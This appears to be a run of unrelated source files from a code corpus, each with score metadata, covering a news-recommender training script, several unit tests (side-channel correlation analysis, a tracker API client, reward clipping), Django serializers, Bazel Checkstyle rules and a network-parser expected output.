from reco_utils.recommender.newsrec.io.mind_iterator import MINDIterator
from reco_utils.recommender.newsrec.newsrec_utils import get_mind_data_set
print("System version: {}".format(sys.version))
print("Tensorflow version: {}".format(tf.__version__))
"""Prepare parameters"""
epochs = 5
seed = 42
batch_size = 32
# Options: demo, small, large
MIND_type = 'demo'
"""Download and load data"""
tmpdir = TemporaryDirectory()
data_path = tmpdir.name
train_news_file = os.path.join(data_path, 'train', r'news.tsv')
train_behaviors_file = os.path.join(data_path, 'train', r'behaviors.tsv')
valid_news_file = os.path.join(data_path, 'valid', r'news.tsv')
valid_behaviors_file = os.path.join(data_path, 'valid', r'behaviors.tsv')
wordEmb_file = os.path.join(data_path, "utils", "embedding.npy")
userDict_file = os.path.join(data_path, "utils", "uid2index.pkl")
wordDict_file = os.path.join(data_path, "utils", "word_dict.pkl")
yaml_file = os.path.join(data_path, "utils", r'nrms.yaml')
mind_url, mind_train_dataset, mind_dev_dataset, mind_utils = get_mind_data_set(MIND_type)
if not os.path.exists(train_news_file):
download_deeprec_resources(mind_url, os.path.join(data_path, 'train'), mind_train_dataset)
if not os.path.exists(valid_news_file):
download_deeprec_resources(mind_url, \
os.path.join(data_path, 'valid'), mind_dev_dataset)
if not os.path.exists(yaml_file):
download_deeprec_resources(r'https://recodatasets.z20.web.core.windows.net/newsrec/', \
os.path.join(data_path, 'utils'), mind_utils)
"""Create hyper-parameters"""
hparams = prepare_hparams(yaml_file,
wordEmb_file=wordEmb_file,
wordDict_file=wordDict_file,
userDict_file=userDict_file,
batch_size=batch_size,
epochs=epochs,
show_step=10)
print(hparams)
"""Train the NRMS model"""
iterator = MINDIterator
model = NRMSModel(hparams, iterator, seed=seed)
print(model.run_eval(valid_news_file, valid_behaviors_file))
model.fit(train_news_file, train_behaviors_file, valid_news_file, valid_behaviors_file)
res_syn = model.run_eval(valid_news_file, valid_behaviors_file)
print(res_syn)
sb.glue("res_syn", res_syn)
"""Save the model"""
model_path = os.path.join(data_path, "model")
os.makedirs(model_path, exist_ok=True)
model.model.save_weights(os.path.join(model_path, "nrms_ckpt"))
"""Output Predcition File"""
group_impr_indexes, group_labels, group_preds = model.run_fast_eval(valid_news_file, valid_behaviors_file)
with open(os.path.join(data_path, 'prediction.txt'), 'w') as f:
for impr_index, preds in tqdm(zip(group_impr_indexes, group_preds)):
impr_index += 1
pred_rank = (np.argsort(np.argsort(preds)[::-1]) + 1).tolist()
pred_rank = '[' + ','.join([str(i) for i in pred_rank]) + ']'
f.write(' '.join([str(impr_index), pred_rank])+ '\n')
f = zipfile.ZipFile(os.path.join(data_path, 'prediction.zip'), 'w', zipfile.ZIP_DEFLATED)
f.write(os.path.join(data_path, 'prediction.txt'), arcname='prediction.txt')
f.close()
| 1.898438 | 2 |
tests/analysis/test_pearson_integration.py | AISyLab/side-channel-attacks | 14 | 12770830 | <gh_stars>10-100
import unittest
import os.path
import numpy as np
from sca.__main__ import CONST_DEFAULT_PLAIN_FILE
from sca.__main__ import CONST_DEFAULT_TRACES_FILE
from sca.__main__ import CONST_DEFAULT_KEYS_FILE
from sca.analysis.pearson import Pearson
class TestPearsonIntegration(unittest.TestCase):
"""Tests the whole Pearson class."""
def test_pearson(self):
""""Test if pearson creates the correct file when ran"""
Pearson.run(np.load(CONST_DEFAULT_TRACES_FILE)[:10000],
np.load(CONST_DEFAULT_KEYS_FILE),
np.load(CONST_DEFAULT_PLAIN_FILE), 5, False, 0, 1, 0)
self.assertTrue(os.path.isfile('out/pearson_correlation_selected_indices.npy'))
def test_pearson_save_trace(self):
""""Test if pearson creates the correct file when ran"""
Pearson.run(np.load(CONST_DEFAULT_TRACES_FILE)[:10000],
np.load(CONST_DEFAULT_KEYS_FILE),
np.load(CONST_DEFAULT_PLAIN_FILE), 5, True, 0, 1, 0)
self.assertTrue(os.path.isfile('out/pearson_correlation_selected_traces.npy'))
| 2.40625 | 2 |
file_handling/excepation handling program test/print_excepation_information_in_msg.class_program.py | swarajRaut01/Python | 0 | 12770831 | <reponame>swarajRaut01/Python
#print excepation information as a msg in program
try:
print(10/0)
except ZeroDivisionError as msg:
print("the type of error:",msg.__class__)
| 2.859375 | 3 |
Linguagens/Python/Exercicios/cursos_em_video/aulas-22_23/107.py | rafaelvizu/Estudos | 0 | 12770832 | <filename>Linguagens/Python/Exercicios/cursos_em_video/aulas-22_23/107.py<gh_stars>0
from pacotes import ex107
print('\033[36;40mExercício Python #107 - Exercitando módulos em Python\033[m\n')
v = float(input('Digite o preço: R$'))
print(f'\nA metade de {v} é R${ex107.metade(v)}')
print(f'O dobro de {v} é R${ex107.dobro(v)}')
print(f'Aumentando 10%, temos R${ex107.aumentar(v, 10)}')
print(f'Reduzindo 13%, temos R${ex107.diminuir(v, 13)}') | 3.265625 | 3 |
java/aspects/checkstyle_aspect/defs.bzl | birkland/dwtj_rules_java | 0 | 12770833 | '''Defines the `checkstyle_aspect`.
'''
load("//java:providers/JavaCompilationInfo.bzl", "JavaCompilationInfo")
load(
"//java:common/extract/toolchain_info.bzl",
"extract_java_runtime_toolchain_class_path_separator",
"extract_checkstyle_toolchain_info",
)
_JAVA_RUNTIME_TOOLCHAIN_TYPE = "@dwtj_rules_java//java/toolchains/java_runtime_toolchain:toolchain_type"
CheckstyleAspectInfo = provider(
fields = {
'output_file': "The output file generated by `checkstyle_aspect`. This will be `None` if the target doesn't include any Java sources to be checked.",
}
)
def _extract_java_executable(aspect_ctx):
return aspect_ctx.toolchains[_JAVA_RUNTIME_TOOLCHAIN_TYPE] \
.java_runtime_toolchain_info \
.java_executable
def _extract_class_path_separator(aspect_ctx):
return aspect_ctx.toolchains[_JAVA_RUNTIME_TOOLCHAIN_TYPE] \
.java_runtime_toolchain_info \
.class_path_separator
def _file_name(target, suffix):
return "{}.checkstyle.{}".format(target.label.name, suffix)
def _checkstyle_aspect_impl(target, aspect_ctx):
# Skip a target if it doesn't provide a `JavaCompilationInfo`.
if JavaCompilationInfo not in target:
return [CheckstyleAspectInfo()]
# Extract some information from the environment for brevity.
actions = aspect_ctx.actions
srcs = target[JavaCompilationInfo].srcs
srcs_args_file = target[JavaCompilationInfo].srcs_args_file
class_path_separator = _extract_class_path_separator(aspect_ctx)
java_executable = _extract_java_executable(aspect_ctx)
checkstyle_toolchain_info = extract_checkstyle_toolchain_info(aspect_ctx)
checkstyle_java_info = checkstyle_toolchain_info.checkstyle_java_info
# Declare an output log file for Checkstyle to write to.
log_file = actions.declare_file(_file_name(target, "log"))
# Create an args file containing Checkstyle's run-time class path.
# TODO(dwtj): Move this into the toolchain so that it isn't re-created in
# every instantiation/application of the `checkstyle_aspect`.
class_path_args = actions.args()
class_path_args.add_joined(
checkstyle_java_info.transitive_runtime_jars,
join_with = class_path_separator,
omit_if_empty = False,
)
class_path_args_file = actions.declare_file(_file_name(target, "class_path.args"))
actions.write(
class_path_args_file,
content = class_path_args,
is_executable = False,
)
# Instantiate a script which will run Checkstyle from a template.
run_checkstyle_script = actions.declare_file(_file_name(target, "sh"))
actions.expand_template(
template = aspect_ctx.file._run_checkstyle_script_template,
output = run_checkstyle_script,
substitutions = {
"{JAVA_EXECUTABLE}": java_executable.path,
"{JAVA_SOURCES_ARGS_FILE}": srcs_args_file.path,
"{CHECKSTYLE_CLASS_PATH_ARGS_FILE}": class_path_args_file.path,
"{CHECKSTYLE_LOG_FILE}": log_file.path,
},
is_executable = True,
)
# Lastly, run our Checkstyle script on the target's srcs:
actions.run(
executable = run_checkstyle_script,
inputs = depset(
direct = [
java_executable,
srcs_args_file,
class_path_args_file,
],
transitive = [
srcs,
checkstyle_java_info.transitive_runtime_jars,
]
),
outputs = [log_file],
mnemonic = "Checkstyle",
progress_message = "Using Checkstyle to check Java sources of Java target `{}`".format(target.label),
use_default_shell_env = False,
)
return [
OutputGroupInfo(default = [log_file]),
CheckstyleAspectInfo(output_file = log_file)
]
checkstyle_aspect = aspect(
implementation = _checkstyle_aspect_impl,
provides = [CheckstyleAspectInfo],
attrs = {
"_run_checkstyle_script_template": attr.label(
default = "@dwtj_rules_java//java:aspects/checkstyle_aspect/TEMPLATE.run_checkstyle.sh",
allow_single_file = True,
),
},
toolchains = [
'@dwtj_rules_java//java/toolchains/checkstyle_toolchain:toolchain_type',
'@dwtj_rules_java//java/toolchains/java_runtime_toolchain:toolchain_type',
],
)
| 2.28125 | 2 |
iaso/api/source_versions_serializers.py | BLSQ/iaso-copy | 0 | 12770834 | <filename>iaso/api/source_versions_serializers.py
import logging
import sys
from io import StringIO
from rest_framework import serializers
from iaso.diffing import Differ, Dumper
from iaso.management.commands.command_logger import CommandLogger
from iaso.models import SourceVersion, OrgUnit, OrgUnitType, Task
from iaso.tasks.dhis2_ou_exporter import dhis2_ou_exporter
logger = logging.getLogger(__name__)
STATUSES = list(OrgUnit.VALIDATION_STATUS_CHOICES) + [("", "all")]
FIELDS = ["name", "parent", "geometry", "groups"]
class DiffSerializer(serializers.Serializer):
ref_version_id = serializers.PrimaryKeyRelatedField(
queryset=SourceVersion.objects.all(), style={"base_template": "select.html"}
)
source_version_id = serializers.PrimaryKeyRelatedField(
queryset=SourceVersion.objects.all(), style={"base_template": "select.html"}
)
source_status = serializers.ChoiceField(required=False, choices=STATUSES)
source_top_org_unit_id = serializers.PrimaryKeyRelatedField(
required=False, default=None, queryset=OrgUnit.objects.all(), allow_null=True
)
source_org_unit_type_ids = serializers.PrimaryKeyRelatedField(
required=False,
default=[],
queryset=OrgUnitType.objects.all(),
many=True,
style={"base_template": "select_multiple.html"},
)
ref_org_unit_type_ids = serializers.PrimaryKeyRelatedField(
required=False,
default=[],
queryset=OrgUnitType.objects.all(),
many=True,
style={"base_template": "select_multiple.html"},
)
ref_top_org_unit_id = serializers.PrimaryKeyRelatedField(
required=False, default=None, queryset=OrgUnit.objects.all(), allow_null=True
)
ref_status = serializers.ChoiceField(required=False, choices=STATUSES)
fields_to_export = serializers.MultipleChoiceField(choices=FIELDS)
def validate(self, attrs):
validated_data = super().validate(attrs)
account = self.context["request"].user.iaso_profile.account
versions = SourceVersion.objects.filter(data_source__projects__account=account)
if validated_data["ref_version_id"] not in versions:
raise serializers.ValidationError({"ref_version_id": ["Unauthorized ref_version_id"]})
if validated_data["source_version_id"] not in versions:
raise serializers.ValidationError({"source_version_id": ["Unauthorized source_version_id"]})
if (
validated_data.get("source_top_org_unit_id")
and validated_data["source_top_org_unit_id"].version != validated_data["source_version_id"]
):
raise serializers.ValidationError({"source_top_org_unit_id": ["not in source_version_id"]})
if (
validated_data.get("ref_top_org_unit_id")
and validated_data["ref_top_org_unit_id"].version != validated_data["ref_version_id"]
):
raise serializers.ValidationError({"ref_top_org_unit_id": ["not in ref_version_id"]})
if validated_data.get("fields_to_export"):
validated_data["fields_to_export"] = list(validated_data["fields_to_export"])
return validated_data
def generate_csv(self):
data = self.validated_data
iaso_logger = CommandLogger(sys.stdout)
if "groups" in data["fields_to_export"]:
data["fields_to_export"].remove("groups")
ignore_groups = False
else:
ignore_groups = True
diffs, fields = Differ(iaso_logger).diff(
data["ref_version_id"],
data["source_version_id"],
ignore_groups=ignore_groups,
show_deleted_org_units=True,
validation_status=data.get("source_status"),
validation_status_ref=data.get("ref_status"),
top_org_unit=data.get("source_top_org_unit_id"),
top_org_unit_ref=data.get("ref_top_org_unit_id"),
org_unit_types=data.get("source_org_unit_type_ids"),
org_unit_types_ref=data.get("ref_org_unit_type_ids"),
field_names=data.get("fields_to_export"),
)
buffer = StringIO()
Dumper(iaso_logger).dump_as_csv(diffs, fields, buffer)
buffer.seek(0)
return buffer
class ExportSerializer(DiffSerializer):
# use same field as diff serializer
def validate(self, attrs):
validated_data = super().validate(attrs)
source_version = validated_data["source_version_id"]
credentials = source_version.data_source.credentials
if not (credentials and credentials.is_valid):
raise serializers.ValidationError({"source_version_id": ["No valid DHIS2 configured on source"]})
return validated_data
def launch_export(self, user):
# use data and not validated data so we have the id
data = self.data
if "groups" in data["fields_to_export"]:
data["fields_to_export"].remove("groups")
ignore_groups = False
else:
ignore_groups = True
task: Task = dhis2_ou_exporter(
ref_version_id=data["ref_version_id"],
version_id=data["source_version_id"],
ignore_groups=ignore_groups,
show_deleted_org_units=True,
validation_status=data.get("source_status"),
ref_validation_status=data.get("ref_status"),
top_org_unit_id=data.get("source_top_org_unit_id"),
top_org_unit_ref_id=data.get("ref_top_org_unit_id"),
org_unit_types_ids=data.get("source_org_unit_type_ids"),
org_unit_types_ref_ids=data.get("ref_org_unit_type_ids"),
field_names=list(data["fields_to_export"]),
user=user,
)
return task
| 1.921875 | 2 |
GEOS_Util/coupled_diagnostics/verification/stress_mon_clim/stress_qscat.py | GEOS-ESM/GMAO_Shared | 1 | 12770835 | #!/bin/env python
import os
import scipy as sp
import matplotlib.pyplot as pl
from mpl_toolkits.basemap.cm import sstanom, s3pcpn_l
from matplotlib import dates
from g5lib import field
# Read validation data set
obs={}
path=os.environ['NOBACKUP']+'/verification/stress_mon_clim'
execfile(path+'/ctl.py')
obs['ctl']=ctl
tx=ctl.fromfile('taux',kind=0).clim(12); tx.data*=10
ty=ctl.fromfile('tauy',kind=0).clim(12); ty.data*=10
tx.shiftgrid(30.);
tx.grid['lon']=sp.where(tx.grid['lon']<29.,tx.grid['lon']+360,\
tx.grid['lon'])
ty.shiftgrid(30.);
ty.grid['lon']=sp.where(ty.grid['lon']<29.,ty.grid['lon']+360,\
ty.grid['lon'])
var=field.cmplx(tx,ty); var.name=ctl.name+' TAU'
ind=[0,1,11]; obs['djf']=var.subset(tind=ind).ave(0); obs['djf'].name+=', DJF'
ind=[5,6,7]; obs['jja']=var.subset(tind=ind).ave(0); obs['jja'].name+=', JJA'
obs['am']=var.ave(0); obs['am'].name+=', Annual Mean'
# Calculate equatorial profile
lonind=sp.logical_and(var.grid['lon'][0]>=130.0,var.grid['lon'][0]<=280.0)
latind=sp.logical_and(var.grid['lat'][:,0]>=-2.1,var.grid['lat'][:,0]<=2.0)
obs['eqprof']=obs['am'].subset(iind=lonind,jind=latind).ave(2)
# Equatorial Annual Cycle
obs['eqac']=var.subset(iind=lonind,jind=latind).ave(2)
obs['eqac'].data-=obs['eqac'].ave(0).data
obs['eqac'].name=var.name+', Eq. Annual Cycle'
# Plots
path=os.environ['NOBACKUP']+'/verification/stress_mon_clim/pics'
copts1={}
copts1['levels']=(0.,0.2,0.4,0.6,0.8,1.,1.5,2,2.5,3)
copts1['cmap']=s3pcpn_l
def plot_map(figure,F,copts):
Nq=10
x=field.absolute(F)
pl.figure(figure); pl.clf()
x.copts=copts
x.plot_map()
F.plot_quiver(Nq)
pl.show()
# DJF
season='djf'
plot_map(1,obs[season],copts1)
pl.savefig(path+'/tau_'+season+'_qscat.png')
# JJA
season='jja'
plot_map(1,obs[season],copts1)
pl.savefig(path+'/tau_'+season+'_qscat.png')
# AM
season='am'
plot_map(1,obs[season],copts1)
pl.savefig(path+'/tau_'+season+'_qscat.png')
# Plot Equatorial Annual Cycle
pl.figure(2);pl.clf()
obs['eqac'].copts={'levels': sp.arange(-0.2,0.21,0.02),\
'cmap' : sstanom,\
'timefmt': dates.DateFormatter('%b')}
obs['eqac'].plot2d()
obs['eqac'].copts={'func': pl.contour,\
'colors': 'black',\
'levels': sp.arange(-0.2,0.21,0.04),\
'timefmt': dates.DateFormatter('%b')}
obs['eqac'].plot2d()
ax=pl.gca(); ax.yaxis.set_major_locator(dates.MonthLocator())
ax.set_title(obs['ctl'].name+' Eq. Annual cycle')
pl.grid(); pl.show()
pl.savefig(path+'/taux_eq_ac_qscat.png')
| 1.820313 | 2 |
IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/test/ssl_helpers.py | timkrentz/SunTracker | 4 | 12770836 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Helper classes for twisted.test.test_ssl.
They are in a separate module so they will not prevent test_ssl importing if
pyOpenSSL is unavailable.
"""
from __future__ import division, absolute_import
from twisted.python.compat import nativeString
from twisted.internet import ssl
from twisted.python.filepath import FilePath
from OpenSSL import SSL
certPath = nativeString(FilePath(__file__.encode("utf-8")
).sibling(b"server.pem").path)
class ClientTLSContext(ssl.ClientContextFactory):
isClient = 1
def getContext(self):
return SSL.Context(SSL.TLSv1_METHOD)
class ServerTLSContext:
isClient = 0
def __init__(self, filename=certPath):
self.filename = filename
def getContext(self):
ctx = SSL.Context(SSL.TLSv1_METHOD)
ctx.use_certificate_file(self.filename)
ctx.use_privatekey_file(self.filename)
return ctx
| 2.140625 | 2 |
microscopeimagequality/constants.py | MihailSalnikov/microscopeimagequality | 77 | 12770837 | <gh_stars>10-100
"""Common constants used across image quality modules."""
VALID_MASK_FORMAT = 'valid_mask_%s'
CERTAINTY_MASK_FORMAT = 'certainty_mask_%s'
PREDICTIONS_MASK_FORMAT = 'predictions_mask_%s'
ORIG_IMAGE_FORMAT = 'orig_name=%s'
PATCH_SIDE_LENGTH = 84
REMOTE_MODEL_CHECKPOINT_PATH = "https://storage.googleapis.com/microscope-image-quality/static/model/model.ckpt-1000042"
| 1.039063 | 1 |
tests/test_aioweenect.py | eifinger/aioweenect | 1 | 12770838 | <reponame>eifinger/aioweenect
"""Tests for `aioweenect.aioweenect`."""
import json
import os
from typing import Any
import aiohttp
import pytest
from aioweenect import AioWeenect
API_HOST = "apiv4.weenect.com"
API_VERSION = "/v4"
@pytest.mark.asyncio
async def test_get_user_with_invalid_token(aresponses):
    """Ensure the client transparently re-authenticates after a 401.

    The mocked server first accepts a login, then rejects the user
    request with an expired-token error; the client is expected to log
    in again and retry the request successfully.
    """

    def queue_login():
        # Each successful login handshake returns the canned login fixture.
        aresponses.add(
            API_HOST,
            f"{API_VERSION}/user/login",
            "POST",
            response=load_json_fixture("login_response.json"),
        )

    # 1) initial login succeeds ...
    queue_login()
    # 2) ... but the user lookup fails with an expired signature.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/100000",
        "GET",
        aresponses.Response(
            body="{"
            '"description": "Signature has expired",'
            '"error": "Invalid token",'
            '"status_code": 401'
            "}",
            status=401,
        ),
    )
    # 3) the client re-authenticates and 4) retries the lookup, which now succeeds.
    queue_login()
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/100000",
        "GET",
        response=load_json_fixture("get_user_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        result = await client.get_user("100000")

        assert result["postal_code"] == "55128"
@pytest.mark.asyncio
async def test_get_user(aresponses):
    """Ensure user details are fetched and decoded correctly."""
    # Mock the login handshake followed by the user-detail endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/100000",
        "GET",
        response=load_json_fixture("get_user_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        user = await client.get_user("100000")

        assert user["postal_code"] == "55128"
@pytest.mark.asyncio
async def test_get_subscription_offers(aresponses):
    """Ensure subscription offers are fetched and decoded correctly."""
    # Mock the login handshake followed by the subscription-offer endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/subscriptionoffer",
        "GET",
        response=load_json_fixture("get_subscription_offer_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        offers = await client.get_subscription_offers()

        # Spot-check a deeply nested price field from the fixture.
        first_offer = offers["items"][0]["option_offers"][0]
        assert first_offer["price_offer"]["de"]["amount"] == 199
@pytest.mark.asyncio
async def test_get_subscription(aresponses):
    """Ensure a single subscription is fetched and decoded correctly."""
    # Mock the login handshake followed by the subscription endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mysubscription/100000",
        "GET",
        response=load_json_fixture("get_subscription_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        subscription = await client.get_subscription("100000")

        assert subscription["options"][0]["amount"] == 99
@pytest.mark.asyncio
async def test_get_zones(aresponses):
    """Ensure tracker zones are fetched and decoded correctly."""
    # Mock the login handshake followed by the zones endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/zones",
        "GET",
        response=load_json_fixture("get_zones_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        zones = await client.get_zones("100000")

        assert zones["items"][0]["distance"] == 100
@pytest.mark.asyncio
async def test_add_zone(aresponses):
    """Ensure a zone can be created and the server reply is decoded."""
    # Mock the login handshake followed by the zone-creation endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/zones",
        "POST",
        response=load_json_fixture("add_zone_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        created = await client.add_zone(
            tracker_id="100000",
            name="test",
            address="test",
            latitude=90.0,
            longitude=1.0,
        )

        assert created["number"] == 186177
@pytest.mark.asyncio
async def test_remove_zone(aresponses):
    """Ensure a zone can be deleted (204 No Content maps to None)."""
    # Mock the login handshake followed by the zone-deletion endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/zones/100000",
        "DELETE",
        aresponses.Response(text="", status=204),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        result = await client.remove_zone(tracker_id="100000", zone_id="100000")

        # A 204 response carries no body, so the client returns None.
        assert result is None
@pytest.mark.asyncio
async def test_get_position(aresponses):
    """Ensure tracker positions for a time window are fetched correctly."""
    # Mock the login handshake followed by the position endpoint.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/position",
        "GET",
        response=load_json_fixture("get_position_response.json"),
    )

    async with aiohttp.ClientSession() as http_session:
        client = AioWeenect(username="user", password="password", session=http_session)

        positions = await client.get_position(
            tracker_id="100000",
            start="2019-04-14T23:05:00.000Z",
            end="2019-04-15T23:05:00.000Z",
        )

        assert positions[0]["latitude"] == 49.0268016
@pytest.mark.asyncio
async def test_get_activity(aresponses):
    """Test getting activity information."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the activity endpoint under test.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/activity",
        "GET",
        response=load_json_fixture("get_activity_response.json"),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.get_activity(
            tracker_id="100000",
            start="2019-04-14T23:05:00.000Z",
            end="2019-04-15T23:05:00.000Z",
        )
        # Value comes from the get_activity_response.json fixture.
        assert response["distance"] == 31246.108984983595
@pytest.mark.asyncio
async def test_get_trackers(aresponses):
    """Test getting tracker information."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the tracker-listing endpoint under test.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker",
        "GET",
        response=load_json_fixture("get_trackers_response.json"),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.get_trackers()
        # Value comes from the get_trackers_response.json fixture.
        assert response["items"][0]["user"]["firstname"] == "Test"
@pytest.mark.asyncio
async def test_set_update_interval(aresponses):
    """Test setting the update interval."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the mode endpoint; 204 No Content on success.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/mode",
        "POST",
        aresponses.Response(text="", status=204),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.set_update_interval(
            tracker_id="100000", update_interval="30M"
        )
        # Empty 204 responses are surfaced to the caller as None.
        assert response is None
@pytest.mark.asyncio
async def test_activate_super_live(aresponses):
    """Test activating super live mode."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the super-live (st-mode) endpoint; 204 No Content on success.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/st-mode",
        "POST",
        aresponses.Response(text="", status=204),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.activate_super_live(tracker_id="100000")
        # Empty 204 responses are surfaced to the caller as None.
        assert response is None
@pytest.mark.asyncio
async def test_refresh_location(aresponses):
    """Test requesting a location refresh."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the position-refresh endpoint; 204 No Content on success.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/position/refresh",
        "POST",
        aresponses.Response(text="", status=204),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.refresh_location(tracker_id="100000")
        # Empty 204 responses are surfaced to the caller as None.
        assert response is None
@pytest.mark.asyncio
async def test_vibrate(aresponses):
    """Test sending a vibration command."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the vibrate endpoint; 204 No Content on success.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/vibrate",
        "POST",
        aresponses.Response(text="", status=204),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.vibrate(tracker_id="100000")
        # Empty 204 responses are surfaced to the caller as None.
        assert response is None
@pytest.mark.asyncio
async def test_ring(aresponses):
    """Test sending a ring command."""
    # Stub the auth endpoint first: the client logs in before the API call.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/user/login",
        "POST",
        response=load_json_fixture("login_response.json"),
    )
    # Stub the ring endpoint; 204 No Content on success.
    aresponses.add(
        API_HOST,
        f"{API_VERSION}/mytracker/100000/ring",
        "POST",
        aresponses.Response(text="", status=204),
    )
    async with aiohttp.ClientSession() as session:
        aioweenect = AioWeenect(username="user", password="password", session=session)
        response = await aioweenect.ring(tracker_id="100000")
        # Empty 204 responses are surfaced to the caller as None.
        assert response is None
def load_json_fixture(filename: str) -> Any:
    """Read and parse a JSON fixture from the local ``fixtures`` directory."""
    fixture_dir = os.path.join(os.path.dirname(__file__), "fixtures")
    with open(os.path.join(fixture_dir, filename), encoding="utf-8") as handle:
        return json.load(handle)
| 2.421875 | 2 |
python/testData/intentions/PyConvertTypeCommentToVariableAnnotationIntentionTest/typeHintFollowedByComment_after.py | jnthn/intellij-community | 2 | 12770839 | <gh_stars>1-10
var: int = undefined()
| 0.84375 | 1 |
drl/envs/wrappers/stateless/test_clip_reward.py | lucaslingle/pytorch_drl | 0 | 12770840 | from drl.envs.testing import LockstepEnv
from drl.envs.wrappers.stateless.clip_reward import ClipRewardWrapper
def test_clip_reward():
env = LockstepEnv()
wrapped = ClipRewardWrapper(env, low=0.0, high=0.5, key='extrinsic')
_ = wrapped.reset()
o_tp1, r_t, d_t, i_t = wrapped.step(0)
assert r_t['extrinsic'] == 0.5
wrapped2 = ClipRewardWrapper(wrapped, low=0.0, high=0.25, key='extrinsic')
_ = wrapped2.reset()
o_tp1, r_t, d_t, i_t = wrapped2.step(0)
assert r_t['extrinsic'] == 0.25
| 2.046875 | 2 |
src/genie/libs/parser/iosxe/tests/c9300/ShowControllers/cli/equal/golden_output_expected.py | balmasea/genieparser | 0 | 12770841 | expected_output = {
"interface_name": "Gi1/0/1",
"if_id": "75",
"phy_registers": {
"0": {
"register_number": "0000",
"hex_bit_value": "1140",
"register_name": "Control Register",
"bits": "0001000101000000",
},
"1": {
"register_number": "0001",
"hex_bit_value": "796d",
"register_name": "Control STATUS",
"bits": "0111100101101101",
},
"2": {
"register_number": "0002",
"hex_bit_value": "ae02",
"register_name": "Phy(B:D3A6) ID 1",
"bits": "1010111000000010",
},
"3": {
"register_number": "0003",
"hex_bit_value": "5011",
"register_name": "Phy(B:D3A6) ID 2",
"bits": "0101000000010001",
},
"4": {
"register_number": "0004",
"hex_bit_value": "01e1",
"register_name": "Auto-Negotiation Advertisement",
"bits": "0000000111100001",
},
"5": {
"register_number": "0005",
"hex_bit_value": "c1e1",
"register_name": "Auto-Negotiation Link Partner",
"bits": "1100000111100001",
},
"6": {
"register_number": "0006",
"hex_bit_value": "006d",
"register_name": "Auto-Negotiation Expansion Reg",
"bits": "0000000001101101",
},
"7": {
"register_number": "0007",
"hex_bit_value": "2001",
